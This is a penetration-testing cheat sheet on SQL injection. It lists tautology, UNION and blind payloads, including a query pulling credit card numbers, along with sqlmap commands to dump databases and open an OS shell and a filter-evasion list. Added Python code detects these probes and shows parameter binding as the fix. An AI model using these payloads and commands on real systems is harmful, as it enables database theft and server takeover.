d4Rk's 1337 h4x0r guide

SQL injection (SQLi)


Last updated 2 years ago

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

--

General

OWASP: WSTG

See the OWASP Web Security Testing Guide (WSTG).

Recon

  • Create a list of input fields

Enum (provoke an error)

  • First test ' or ;

  • Comments -- /* */ #

  • Enter different type, e.g. string instead of int

  • Monitor responses (the error may be hidden inside JS or HTML rather than shown on the page)

  • Generic error only (e.g. just an HTTP 500, no database message) -> blind SQL injection

Injections

Classic

  • Most basic 1' or '1' = '1

  • Escape parentheses and comment out further conditions 1' or '1' = '1'))/*

  • App logic may expect exactly one result 1' or '1' = '1')) LIMIT 1/*

Select

  • http://www.example.com/product.php?id=10 AND 1=2 Error or blank page -> vulnerable

Stacked Queries

  • http://www.example.com/product.php?id=10; INSERT INTO users (…)

Fingerprinting

MySQL:

You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near '\'' at line 1

Oracle:

ORA-00933: SQL command not properly ended

MS SQL Server:

Microsoft SQL Native Client error '80040e14'
Unclosed quotation mark after the character string

Version query via UNION (note: the LIMIT clause is MySQL syntax; T-SQL has no LIMIT, use TOP instead):

SELECT id, name FROM users WHERE id=1 UNION SELECT 1, @@version limit 1, 1

PostgreSQL:

Query failed: ERROR: syntax error at or near
"'" at character 56 in /www/site/test.php on line 121.
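The error strings above are exactly what a defender can key detection on. The following is an added example (not part of the original page): a small Python 3 script that scans constructed web-server access-log lines for the request-side markers from the enumeration step (quote followed by OR/AND, comment sequences, UNION ... SELECT, ORDER BY probes, stacked queries) and matches response bodies against the four DBMS error fingerprints listed here. The log lines, response bodies, and function names are assumptions made up for the example; the patterns are heuristic and will need tuning per application.

```python
import re
from urllib.parse import unquote_plus

# Error-message fingerprints taken from the list above, one regex per DBMS.
DB_ERROR_SIGNATURES = {
    "MySQL": re.compile(r"You have an error in your SQL syntax", re.I),
    "Oracle": re.compile(r"\bORA-\d{5}\b"),
    "MS SQL Server": re.compile(r"Unclosed quotation mark|SQL Native Client error", re.I),
    "PostgreSQL": re.compile(r"syntax error at or near", re.I),
}

# Request-side markers from the enumeration step: a quote followed by OR/AND,
# comment sequences, UNION ... SELECT, ORDER BY probes and stacked queries.
# Heuristic only: expect false positives where parameters legitimately carry
# SQL-like words; tune per application.
INJECTION_MARKERS = re.compile(
    r"'\s*(?:or|and)\b"
    r"|--|/\*"
    r"|\bunion\b.+?\bselect\b"
    r"|\border\s+by\b"
    r"|;\s*(?:insert|update|delete|drop)\b",
    re.I,
)

# Request part of an Apache/nginx combined log line: "METHOD TARGET HTTP/x.y" STATUS
ACCESS_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def fingerprint_error(body: str):
    """Return the DBMS whose error text appears in a response body, or None."""
    for dbms, pattern in DB_ERROR_SIGNATURES.items():
        if pattern.search(body):
            return dbms
    return None


def request_markers(target: str):
    """Return the injection markers found in a URL-decoded request target."""
    decoded = unquote_plus(target)  # decode %27, %20, ... before matching
    return [m.group(0) for m in INJECTION_MARKERS.finditer(decoded)]


def scan_access_log(lines):
    """Return (line_no, target, markers, status) for every request carrying markers."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = ACCESS_LINE.search(line)
        if not m:
            continue
        markers = request_markers(m.group("target"))
        if markers:
            hits.append((line_no, m.group("target"), markers, int(m.group("status"))))
    return hits


# Constructed sample data (not real traffic): probes modelled on the payloads on this page.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /product.php?id=10 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /product.php?id=10%20ORDER%20BY%2010-- HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /product.php?id=10%20UNION%20SELECT%201,null,null-- HTTP/1.1" 200 700',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /login.php?user=1%27%20or%20%271%27%3D%271 HTTP/1.1" 200 300',
]
SAMPLE_RESPONSES = [
    "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version",
    "ORA-00933: SQL command not properly ended",
    "<html><body>Welcome back</body></html>",
]

if __name__ == "__main__":
    for line_no, target, markers, status in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {line_no}: status {status} markers {markers} target {target}")
    for body in SAMPLE_RESPONSES:
        print(fingerprint_error(body), "<-", body[:40])
```

A 500 status paired with an ORDER BY probe (line 2 of the sample) is the server-side view of the "increase ORDER BY until an error occurs" step, so correlating request markers with status codes and with error fingerprints in the response body is more useful than either signal alone.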

information_schema

The information_schema database holds metadata about every table and column. Table names are in information_schema.tables (column table_name) and column names in information_schema.columns (column column_name).

Retrieve all the table names:

select group_concat(table_name) from information_schema.tables

Retrieve all the column names of a given table:

select group_concat(column_name) from information_schema.columns where table_name = '<tablename>'

Exploitation

Union

Example payload:

1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable

  • Determine the number of columns: increase the ORDER BY index until an error occurs.

http://www.example.com/product.php?id=10 ORDER BY 10--

  • Determine the data types of the columns: use null as a placeholder for columns not yet determined.

http://www.example.com/product.php?id=10 UNION SELECT 1,null,null--

  • Ensure more than one result is shown (use an id that does not exist so only the injected row is returned).

http://www.example.com/product.php?id=99999 UNION SELECT 1,1,null--
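To show why the Classic payloads and the Union probes above behave as described, and what stops them, here is an added example (not from the original page) in Python 3 using the standard sqlite3 module. The schema, data and function names are constructed for the example; the SQL dialect is SQLite's, which handles UNION, ORDER BY and comments the same way as the servers discussed here. It contrasts string concatenation in a quoted context (login) and in an unquoted numeric context (product id) with parameter binding plus input validation.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory schema standing in for the page's users / products tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hunter2'), (2, 'alice', 's3cret');
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (10, 'widget', 9.99), (11, 'gadget', 19.99);
    """)
    return conn


# Vulnerable, quoted string context: input is pasted into the SQL text, so a single
# quote ends the literal and the rest is parsed as SQL (the Classic payloads).
def login_vulnerable(conn, username, password):
    sql = f"SELECT id, username FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchall()


# Vulnerable, numeric context: no quotes at all, so no quote is needed to break out
# (the ORDER BY / UNION SELECT probes work directly).
def product_vulnerable(conn, product_id):
    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"
    return conn.execute(sql).fetchall()


# Hardened: parameter binding; the driver never interprets the input as SQL.
def login_safe(conn, username, password):
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def product_safe(conn, product_id):
    pid = int(product_id)  # reject anything that is not a plain integer before it reaches SQL
    return conn.execute("SELECT id, name, price FROM products WHERE id = ?", (pid,)).fetchall()


def outcome(fn, *args):
    """Run fn(*args); return ('rows', rows) or ('error', exception class name)."""
    try:
        return ("rows", fn(*args))
    except Exception as exc:
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    conn = make_db()
    # Classic: OR '1'='1' in the password field turns the WHERE clause into a tautology.
    print(login_vulnerable(conn, "admin", "1' or '1' = '1"))          # both users
    print(login_safe(conn, "admin", "1' or '1' = '1"))                # []
    # App expects exactly one row: LIMIT 1 plus a comment that swallows the trailing quote.
    print(login_vulnerable(conn, "admin", "' or '1' = '1' LIMIT 1/*"))  # [(1, 'admin')]
    # Union: ORDER BY beyond the column count raises an error, within it does not.
    print(outcome(product_vulnerable, conn, "10 ORDER BY 10--"))      # ('error', 'OperationalError')
    print(outcome(product_vulnerable, conn, "10 ORDER BY 3--")[0])    # 'rows'
    # Union with null placeholders appends an attacker-controlled row.
    print(product_vulnerable(conn, "10 UNION SELECT 1,null,null--"))  # two rows
    # Hardened lookup rejects the payload before any SQL runs.
    print(outcome(product_safe, conn, "10 UNION SELECT 1,null,null--"))  # ('error', 'ValueError')
```

Parameter binding alone already neutralises the quoted-context payloads; the integer cast in product_safe is an extra allow-list check that turns the numeric-context probes into an application error with no database involvement.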

Boolean

Useful for blind SQL injections

  • Iterate one char at a time

1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1

Error based

TODO

Out of band

TODO

Time delay

TODO

Stored procedure

TODO

Automatic / Tools

  • https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection

  • https://github.com/dtrip/mysqloit

sqlmap

Url formats

GET  <host>/index.php?id=1337
POST <host>/index.php --data="id=1337"

Commands

Grab the database banner (-b is short for --banner)

sqlmap -u <url> -b

Use request (e.g. from burp)

sqlmap -r <file-with-request>

Crawl / enumerate

sqlmap -u <url> --crawl=1

Dump / extract data

sqlmap -u <url> --current-user
sqlmap -u http://<host>/comment.php?id=738 --dbms=mysql --dump --threads=5

OS shell / get a remote shell

sqlmap -u <url> --os-shell
sqlmap -u http://<host>/comment.php?id=738 --dbms=mysql --os-shell

sqlninja

Test sqlninja

sqlninja -mt -f <config-file>

Set up listener

tcpdump -nnvXSs 0 -c2 icmp

Execute sqlninja

sqlninja -mc -f <config-file>

config files

GET

--httprequest_start--
GET <host>/index.php?id=1337;__SQL2INJECT__ HTTP/1.0
Host: <host>
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
Connection: close
--httprequest_end--

POST

--httprequest_start--
POST <host>/index.php HTTP/1.0
Host: <host>
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
Connection: close
id=1337';__SQL2INJECT__
--httprequest_end--

Evasion

  • Whitespaces

  • Null bytes (%00)

  • Inline comments

  • URL encoding

  • Char encoding

  • String concatenation

  • Hex encoding

  • Declare variables

  • Alternative expression of 'or 1=1'

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Authorization: Basic <hash>

References

  • Wikipedia: SQL injection

  • SQL Injection | pentestmonkey

  • GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF

  • Wordlist | fuzzdb

  • PortSwigger - SQL injection cheat sheet

  • OWASP: WSTG

  • sqlmap: automatic SQL injection and database takeover tool

  • sqlninja/sqlninja.conf at master · xxgrunge/sqlninja · GitHub